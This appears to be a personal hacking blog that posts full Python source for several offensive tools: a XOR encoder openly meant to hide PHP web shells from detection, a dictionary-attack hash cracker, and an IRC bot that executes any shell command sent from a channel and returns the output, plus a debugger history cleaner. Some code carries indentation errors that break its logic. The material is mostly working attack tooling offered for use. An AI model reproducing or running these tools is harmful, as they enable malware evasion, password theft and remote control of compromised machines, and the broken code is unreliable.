No new updates

hello,

I blog on tumblr, and no new updates here anymore.

Advertisements

The blog is not dead!

Hey guys,

I want to say “the blog is not dead!”, I’m very busy these days and I’d like to share some of my projects soon.
Meanwhile, If you’re having any ideas, any requests etc join us on IRC, thanks.

PSU

What is PSU ?
PSU is a xor encoder for php shells (“php shell undetector”, indeed a tool for hackers)
You can xor your php code with the following code.

#!/usr/bin/python

import sys

def usage() :
	print 'Usage : %s [file] [key]' % sys.argv[0]
	exit()


def main(fn, key) :
	try :
		Input = file(fn, 'r').read()

	except :
		usage()

	enc = ''
	res = ''
	c = 0

	if Input.find('<?php') != -1 :
		Input = Input.replace('<?php', '')

	elif Input.find('<?') != -1 :
		Input = Input.replace('<?', '')

	elif Input.find('?>') != -1 :
		Input = Input.replace('?>', '')

	for i in Input :
		enc += chr(ord(i) ^ ord(key[c]))

		if c == len(key)-1 :
			c = 0
		continue
	c += 1

	for ii in enc :
		res += r'\x' + ii.encode('hex')

	x = fn[:-fn.find('.')-2]
	y = x + 'xored.'
	z = y + fn[fn.find('.')+1:]

	Output = file(z, 'w')
	Output.write('<?php\n')
	Output.write('$code = "' + res + '";\n')
	Output.write('$key = "' + key + '";\n')
	Output.write('''$mcode = "";
	$c2 = 0;

	for ($c=0; $c<=strlen($code)-1; $c++)
{
	$mcode .= chr(ord($code[$c]) ^ ord($key[$c2]));
	if ($c2 == strlen($key)-1)
	{
		$c2 = 0;
		continue;
	}
	$c2++;
}
eval($mcode);
?>''')
	Output.close()



if len(sys.argv) == 3 :
	main(sys.argv[1], sys.argv[2])
	print 'Done!'

else :
	usage()

Usage
python PSU.py [file] [key]

e.g.
python PSU.py test.php s1n4

This makes a file with the name of “test.xored.php”, this is output.

SHC

SHC is the name of a tool that written in python by s1n4 😀
A simple hash password cracker with dictionary attack, that can crack the following algorithms.
md5, sha1, sha224, sha256, sha384, sha512

Just put your hash passwords in a text file and try it with big dictionaries.
(This puts the results in a text file with the name of “SHC”)

#!/usr/bin/python

import hashlib, time, sys, os

def aboutit() :
	print '''
  ##########                                      ##########
    #####               ____            _____        #####
    #####        ______/_   |  ____    /  |  |       #####
    #####       /  ___/ |   | /    \  /   |  |_      #####
    #####       \___ \  |   ||   |  \/    ^   /      #####
    #####      /____  > |___||___|  /\____   |       #####
    #####           \/            \/      |__|       #####
    #####                                            #####
    ##### This is a tool for cracking hash passwords #####
    #####              Dictionary attack             #####
  ##########                                      ##########
  '''

def clear() :
	if "win" in sys.platform.lower() :
		os.system("cls")

	if "linux" in sys.platform.lower() :
		os.system("clear")

def Hash(x, y) :
	if len(x) == 32 :
		md5 = hashlib.md5(y).hexdigest()
		return md5

	elif len(x) == 40 :
		sha1 = hashlib.sha1(y).hexdigest()
		return sha1

	elif len(x) == 56 :
		sha224 = hashlib.sha224(y).hexdigest()
		return sha224

	elif len(x) == 64 :
		sha256 = hashlib.sha256(y).hexdigest()
		return sha256

	elif len(x) == 96 :
		sha384 = hashlib.sha384(y).hexdigest()
		return sha384

	elif len(x) == 128 :
		sha512 = hashlib.sha512(y).hexdigest()
		return sha512

	else :
		return "error"

def main() :
	clear()
	aboutit()

	dfn = raw_input("\nEnter dictionary file name >> ")
	time.sleep(0.5)
	pfn = raw_input("\nEnter hash password file name >> ")
	time.sleep(0.3)
	count1 = 0
	count2 = 0

	try :
		dicfile = open(dfn, "rb").read().splitlines()

	except :
		print "\n\t[-]Sorry, cant open dictionary file"

	try :
		passfile = open(pfn, "rb").read().splitlines()

	except :
		print "\n\t[-]Sorry, cant open hash passwords file"

	report = open("SHC.txt", "a")
	report.write("Start at " + time.ctime() + "\n\n")
	print "\n\t[+]Start The Cracking . . ."

	while len(passfile) > count2 :

		if Hash(passfile[count2], dicfile[count1]).lower() == passfile[count2].lower() :
			cracked = passfile[count2] + "\tCracked --->\t" + dicfile[count1] + "\n\n"
			report.write(cracked)
			count1 = 0
			count2 += 1
			if len(passfile) == count2 :
				break

		if len(dicfile) - 1 == count1 or Hash(passfile[count2], dicfile[count1]) == "error" :
			failed = passfile[count2] + "\tFailed\t\n\n"
			report.write(failed)
			count1 = 0
			count2 += 1
			if len(passfile) == count2 :
				break

		count1 += 1

	report.write("\nEnd of the cracking in " + time.ctime() + "\n\n\n")
	report.close()
	print "\n\t[+]End Of The Cracking . . ."
	time.sleep(1)

while True :
	main()

Ahh, First of all you need to big dictionaries and you can download them at http://goo.gl/elNK

SHBot

You can run shell commands from IRC channel with the following code.

#!/usr/bin/python

import os, random, socket

def main() :
    num = ''
    for i in range(0, 3) :
        rand = random.randrange(0, 10)
        num += str(rand)

    NICK = 'SH[' + num + ']'
    USER = 's1n4zbot'
    SERV = 'Enter server'
    CHAN = '#Enter channel'

    sock = socket.socket()

    try :
        sock.connect((SERV, 6667))
        print 'Connected!'

    except :
        print 'Cant connect to the server'
        exit()

    sock.send('NICK %s\r\n' % NICK)
    sock.send('USER %s %s %s :Bot\r\n' % (USER, USER, SERV))

    while True :
        data = sock.recv(1024)

        if 'End of /MOTD command' in data :
            sock.send('JOIN %s\r\n' % CHAN)
            break

	while True :
        data = sock.recv(1024)

        args = data.replace(':', '').split()
        name = args[0][:args[0].find('!')]

        print data

        if len(args) >= 1 and args[0] == 'PING' :
            sock.send('PONG %s\r\n' % data.split()[1])
            continue

        if len(args) >= 3 and args[1] == 'KICK' and args[3] == NICK :
            sock.send('JOIN %s\r\n' % CHAN)
            continue

        if len(args) >= 5 and args[3] == '!do' :
            command = data[data.find('!do')+4:-2]
            results = os.popen(command).read().splitlines()
            for result in results :
                sock.send('PRIVMSG %s :%s\r\n' % (CHAN, result))
            continue

        if len(args) >= 4 and args[3] == '!quit' :
            QMSG = data[data.find('!quit')+6:-2]
            sock.send('QUIT :%s\r\n' % QMSG)
            exit()

main()

ImmDbg history cleaner

I hate histories of works in softwares 😀
I did remove that manually but I do with script now.
So I wrote a script in python for cleaning Immunity debugger histories 🙂

#!/usr/bin/python

#Immunity Debugger History cleaner
#Author: s1n4

from ConfigParser import RawConfigParser

path = 'C:\\Program Files\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.ini'
confr = RawConfigParser()    #For reading config
confw = RawConfigParser()    #For writing config

confr.read(path)             #Read config

for c in range(0, 20) :
    confr.remove_option('History', 'executable' + '[' + str(c) + ']')
    #Removing items of history in ImmDbg conf

sections = confr.sections()           #Sections of conf

for i in sections :
    confw.add_section(i)              #Add sections of conf
    for ii in confr.items(i) :
        confw.set(i, ii[0], ii[1])    #Set items

confw.write(open(path, 'w'))
#Writing and replacing config